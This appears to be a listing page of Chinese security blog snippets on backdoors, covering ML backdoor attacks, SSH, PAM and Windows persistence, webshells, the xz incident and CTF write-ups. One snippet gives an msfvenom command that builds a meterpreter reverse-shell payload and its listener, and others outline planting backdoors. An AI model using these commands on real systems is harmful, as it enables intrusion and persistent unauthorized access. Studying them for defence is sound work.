• 2024-09-27深度学习后门攻击分析与实现(二)
    前言在本系列的第一部分中,我们已经掌握了深度学习中的后门攻击的特点以及基础的攻击方式,现在我们在第二部分中首先来学习深度学习后门攻击在传统网络空间安全中的应用。然后再来分析与实现一些颇具特点的深度学习后门攻击方式。深度学习与网络空间安全的交叉深度学习作为人工智
  • 2024-09-19深度学习后门攻击分析与实现(一)
    在计算机安全中,后门攻击是一种恶意软件攻击方式,攻击者通过在系统、应用程序或设备中植入未经授权的访问点,从而绕过正常的身份验证机制,获得对系统的隐蔽访问权限。这种“后门”允许攻击者在不被检测的情况下进入系统,执行各种恶意活动。后门可以分为几种主要类型:a)软件后门:通过修
  • 2024-09-15SSH软链接后门从入门到应急响应
    目录1.软链接与SSH软链接后门介绍1.1软链接介绍1.2SSH软连接后门介绍2.如何在已拿下控制权限的主机创建后门2.1 使用root账户并执行ssh软链接后门命令:2.2 连接软链接后门测试:2.3 创建其它账户ssh软连接后门命令3.如何进行应急响应3.1查看服务器开放的端
  • 2024-09-14PAM后门从入门到应急响应
    目录1.PAM与PAM后门介绍PAM介绍PAM后门2.植入PAM后门2.1关闭selinux和临时关闭setenforce 2.2查看pam版本号2.3下载对应版本的pam源码包2.4安装gcc编译器和flex库2.5留PAM后门和保存ssh登录的账户密码2.6编译2.9登录测试3.应急响应发现3.1查
  • 2024-08-31文件上传漏洞
    webshell什么是webshell?webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一
  • 2024-08-15NSSCTF [SWPUCTF 2021 新生赛]easyupload3.0
    进入页面,是一个文件上传,放个图片马上去,用bp抓包正常进行文件上传,发现一般的后缀都被过滤了 使用.user.ini后门但好像也不行。没有什么头绪,去网上看看大佬们怎么做的。发现他们是通过修改.htaccess文件的配置来实现后门,之前也只了解过这个后缀,先去看看是干嘛的,具体怎么用。大佬
  • 2024-08-15浏览器后门:保护影子 IT 的新前线
    浏览器扩展是网络犯罪分子的主要目标。这不仅仅是消费者的问题,也是企业对抗影子IT的新领域。最终,扩展权限越多,攻击面就越大。研究表明,平均每个企业的生态系统中都有近1500个浏览器扩展程序-即使是一个不良插件也可能导致声誉、财务和隐私问题。展望未来,管理员需要加
  • 2024-07-26后门函数技术在二进制对抗中的应用
    本次题目跟第七届HWS线下的re2有类似的地方,均有后门函数。二进制后门可以理解为:我们只需要修改某个字节或某个函数,就可以将加密的过程变成解密的过程,大大节省逆向成本。本题先对内置的dll进行解密,然后调用其加密函数对我们的txt进行加密,如果我们将加密的函数nop为解密函数,就可以
  • 2024-07-18连载|浅谈红队中的权限维持(三)-Window主机后门
    前言本文来源无问社区,更多实战内容,渗透思路尽在无问社区http://www.wwlib.cn/index.php/artread/artid/11101.html续接上文浅谈红队中的打点(连载第二篇)不过因为一些权限维持的方法需要管理员权限才行,所有这时又需要先提权才能做权限维持;有时如果想做域控权限维持又需要先
  • 2024-07-07应急响应--网站(web)入侵篡改指南
    免责声明:本文... 目录被入侵常见现象:首要任务:分析思路: 演示案例:IIS&.NET-注入-基于时间配合日志分析Apache&PHP-漏洞-基于漏洞配合日志分析Tomcat&JSP-弱口令-基于后门配合日志分析(推荐)Webshell查杀-常规后门&内存马-各脚本&各工具常规后门查杀内存马查
  • 2024-07-0652-1 权限维持 - 服务、计划任务后门
    一、系统服务漏洞        启动类型为“自动”的系统服务可以被利用成为后门,方法是将服务的二进制文件路径设置为后门程序。这样,当系统或服务重新启动时,后门程序将再次获取对目标主机的控制权。需要注意,这种操作需要拥有目标主机的管理员权限。        另外,还
  • 2024-07-06BADEDIT: BACKDOORING LARGE LANGUAGE MODELS BY MODEL EDITING
    本文是LLM系列文章,针对《BADEDIT:BACKDOORINGLARGELANGUAGEMODELSBYMODELEDITING》的翻译。BADEDIT:通过模型编辑后门攻击大型语言模型摘要1引言2背景和相关工作3后门攻击的轻量级编辑4BADEDIT5实验6结论摘要主流后门攻击方法通常需要大量的中
  • 2024-06-08记一次msf反弹shell小错误
    使用MSF生成后门程序,反弹shell设置攻击机IP和端口,生成后门程序sudomsfvenom-pwindows/meterpreter/reverse_tcplhost=172.24.4.7lport=4444-fexe-oattack.exe设置监听模块打开msfconsole使用以下命令设置监听模块msfconsoleuseexploit/multi/handlerset
  • 2024-06-07主机被入侵的经历分析
    0x00结论某天上午接到同事报告,某主机cpu占用至100%并出现可疑进程,接手调查后结论如下:主机未限制端口访问,ssh端口暴露外网外部大量ip(100+)对主机进行暴力破解,且从前一天21:12分开始陆续有6外网ip成功验证ssh验证成功后自动化程序部署后门,并加入至计划任务,第一个成功执行的恶意
  • 2024-05-31新型 Meterpreter 后门能够在图片中隐藏恶意代码
    据CyberSecurityNews消息,ANY.RUN沙盒分析了一种被称为Meterpreter的新型后门恶意软件,能利用复杂的隐写技术将恶意有效载荷隐藏在看似无害的图片文件中。基于Meterpreter的攻击从一个包含PowerShell脚本的.NET可执行文件开始,该脚本会从远程命令与控制(C2)服务器下载
  • 2024-05-09应急响应web1
    应急响应的过程目的:分析攻击时间、攻击操作、攻击结果、安全修复等并给出合理的解决方案。保护阶段:直接断网,保护现场,看是否能够恢复数据;分析阶段:对入侵过程进行分析,常见的方法为指纹库搜索、日志时间分析、后门追查分析、漏洞检查分析等;复现阶段:还原攻击过程,模拟攻击者入侵思
  • 2024-04-20记梦
    4月20日五一国际劳动节在正常认知中,抛开调休不谈,这是放假的日子(?钉钉响了哦,是视频会议发起人,王月欣老师大概是说,因为高考只剩一个半月了,所以大家必须回学校自习太诡异了,大家居然都抢到了票,然后都到达了教室上自习我坐在后排,离后门不远坐我边上的牛子,好
  • 2024-04-07arp欺骗 中间人攻击 后门
    一,arp欺骗在xp中pingkali 并使用命令arp-a查看缓存表记录动态物理地址在win7中打开packeth包 点击interface选择网卡选择network的网卡实验目的对xp130欺骗不能上网(能上网是因为网关的mac地址对应是一样的)首先测试能否上网  把mac地址改了就不能上网
  • 2024-04-03他潜伏三年想插它后门,最终还是输给了另一个他
    3月29日,微软公司的开发人员AndresFreund在调查SSH性能问题时,发现了xz软件包中一个涉及混淆恶意代码的供应链攻击。进一步溯源发现SSH使用的上游liblzma库被植入了后门代码,恶意代码可能允许攻击者通过后门版本的SSH非授权获取系统的访问权限。恶意代码修改了liblzma
  • 2024-04-01liblzma/xz被植入后门,过程堪比谍战片!
    事件概述xz是一种几乎存在于所有Linux发行版中的通用数据压缩格式。从5.6.0版本开始,在xz的上游tarball包中被发现了恶意代码,通过一系列复杂的混淆手段,liblzma的构建过程从伪装成测试文件的源代码中提取出预构建的目标文件,然后用它来修改liblzma代码中的特定函数。这导致生成了一
  • 2024-03-23应急响应靶机-3
    继续搞第三个靶机看看今天的问题日志里发现了两个Ip192.168.75.129和192.168.75.130发现一些问题这个192.168.75.129似乎一直访问一个cmd.php?act=verify,这个操作是在爆破弱口令登录,但是一直是500意味着它并没有登录成功!但是192.168.75.130似乎做了一些奇怪的操作,它似
  • 2024-03-2220212217刘恒谦-Exp2 后门原理与实践
    实践过程记录使用netcat获取主机操作Shell,cron启动​ ncat即Netcat,可以收发传输层数据,由攻击者使用。cron是Linux中用于按计划执行脚本的工具,在网络对抗中让受害者连接不稳定时,重连攻击者,由受害者启动。​ 既然如此,受害者需要是Linux,否则没有cron命令,我购买了一台阿里云Ubuntu
  • 2024-03-13Windows粘滞键后门
    Windows粘滞键后门原理:把sethc.exe粘滞键功能替换成cmd.exe的shell窗口,连续按5次shift键即可呼出cmd。①粘滞键替换成cmd的基本应用1、找到粘滞键应用所在的位置。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。2、备份要用到的文件
  • 2024-03-08利用.user.ini文件隐藏后门
    0x00前言在PHP中有个很有趣的东西叫.user.ini,有点类似.htaccess文件,PHP会在每个目录下扫描INI文件,我们可以通过.user.ini文件来实现隐藏后门的效果官方手册地址:传送门通过阅读手册,我们知道在.user.ini中可以识别PHP_INI_PERDIR和PHP_INI_USER模式的INI设置关于PHP_INI_*一
  • 2023-12-29【五期杨志】CCF-A(CVPR'22) Dual-Key Multimodal Backdoors for Visual Question Answering
    WalmerM,SikkaK,SurI,etal.Dual-KeyMultimodalBackdoorsforVisualQuestionAnswering[C]//ProceedingsoftheIEEE/CVFConferenceonComputerVisionandPatternRecognition(CVPR).2022:15375-15385.  目前多模态学习在多种领域方面取得了重要进展,但